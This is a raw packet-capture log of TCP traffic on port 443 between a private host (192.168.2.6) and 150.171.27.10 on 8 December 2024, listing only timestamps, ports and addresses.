Dec 8, 2024 13:31:20.561945915 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.561953068 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.561969042 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.561984062 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.563818932 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.563836098 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.563870907 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.563877106 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.563908100 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.563918114 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.567030907 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.567095041 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.567099094 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.567111015 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.567132950 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.567162991 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.567176104 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.567188025 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.567194939 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.567218065 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.567230940 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.567231894 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.567373991 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.567512035 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.567531109 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.567565918 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.567572117 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.567595959 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.567610025 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.569704056 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.569716930 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.572391987 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.572407007 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.572467089 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.572475910 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.572566032 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.573684931 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.573726892 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.573740959 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.573750019 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.573786974 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.573797941 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.573801041 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.573935032 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.574076891 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.574095011 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.574126959 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.574132919 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.574158907 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.574181080 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.578516006 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.578531981 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.582166910 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.582182884 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.582226992 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.582235098 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.582262039 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.582283020 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.582448959 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.582463980 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.582499981 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.582504988 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.582534075 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.582544088 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.589679003 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.589740038 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.589876890 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.589889050 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.589950085 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.590534925 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.590550900 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.590606928 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.590620041 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.590658903 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.633285999 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.633358002 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.633367062 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.633582115 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.638469934 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.638535976 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.638541937 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.638587952 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.642776966 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.642834902 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.642839909 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.643091917 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.646400928 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.646476030 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.646481037 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.646555901 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.650963068 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.651021004 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.651026011 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.651063919 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.654659986 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.654720068 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.654725075 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.654804945 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.659385920 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.659449100 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.659452915 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.659612894 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.663086891 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.663160086 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.663165092 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.663203955 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.666663885 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.666719913 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.666723967 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.666771889 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.671058893 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.671117067 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.671122074 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.671159029 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.674474955 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.674560070 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.674565077 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.674726009 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.679758072 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.679841042 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.679846048 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.679997921 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.682945013 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.683001041 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.683005095 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.683090925 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.686640024 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.686706066 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.686711073 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.686861038 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.691203117 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.691276073 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.691281080 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.691365957 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.694943905 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.695012093 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.695018053 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.695067883 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.716864109 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.716885090 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.716953993 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.716968060 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.717000008 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.717019081 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.724061012 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.724078894 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.724159002 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.724170923 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.724214077 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.728092909 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.728116035 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.728189945 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.728195906 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.728226900 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.728246927 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.731396914 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.731431007 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.731482983 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.731492996 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.731524944 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.731542110 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.735761881 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.735789061 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.735833883 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.735840082 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.735871077 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.735897064 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.737821102 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.737839937 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.737901926 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.737909079 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.737956047 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.742362976 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.742379904 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.742443085 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.742449999 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.742564917 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.744992971 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.745009899 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.745064974 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.745074034 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.745112896 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.745134115 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.750211954 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.750232935 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.750273943 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.750281096 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.750341892 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.752295971 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.752314091 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.752392054 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.752401114 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.752443075 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.757460117 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.757477999 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.757524014 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.757580042 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.757585049 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.757657051 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.759182930 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.759197950 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.759244919 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.759253025 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.759293079 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.759316921 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.764616013 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.764631987 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.764688015 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.764693022 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.764743090 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.766484976 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.766501904 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.766566038 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.766575098 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.766608000 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.766623020 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.772166967 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.772186995 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.772245884 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.772253036 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.772310019 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.778805017 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.778826952 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.778889894 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.778907061 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.778929949 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.778953075 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.826322079 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.826391935 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.826412916 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.826464891 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.829663038 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.829757929 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.829762936 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.829854012 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.833277941 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.833379984 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.833384991 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.833425045 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.837184906 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.837380886 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.837387085 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.837558031 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.840610981 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.840708017 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.840713978 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.840837955 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.843796015 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.843871117 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.843875885 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.844480991 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.848129034 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.848210096 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.848215103 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.848262072 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.851556063 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.851617098 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.851622105 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.851661921 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.856142044 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.856220961 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.856226921 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.856262922 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.858644009 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.858733892 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.858738899 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.858777046 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.862854004 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.862941980 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.862947941 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.863004923 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.866370916 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.866434097 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.866439104 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.866483927 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.869477987 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.869579077 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.869584084 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.870193958 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.873836994 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.873904943 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.873909950 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.873969078 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.877131939 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.877316952 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.877321959 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.877461910 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.881449938 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.881530046 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.881535053 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.882054090 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.909799099 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.909820080 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.909912109 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.909938097 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.909989119 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.916512966 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.916559935 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.916632891 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.916644096 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.916666031 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.916682005 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.918905973 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.918962002 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.918971062 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.918979883 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.919018984 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.919269085 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.919342995 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.919343948 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.919439077 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.920770884 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.920785904 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.923958063 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.923979044 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.924091101 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.924101114 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.924176931 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.930213928 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.930231094 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.930285931 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.930296898 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.930345058 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.937443018 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.937459946 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.937535048 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.937545061 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.937587023 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.941092014 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.941131115 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.941205978 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.941797972 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.941812992 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.944633007 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.944649935 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.944752932 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.944762945 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.944909096 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.951436996 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.951456070 CET	443	49727	150.171.27.10	192.168.2.6
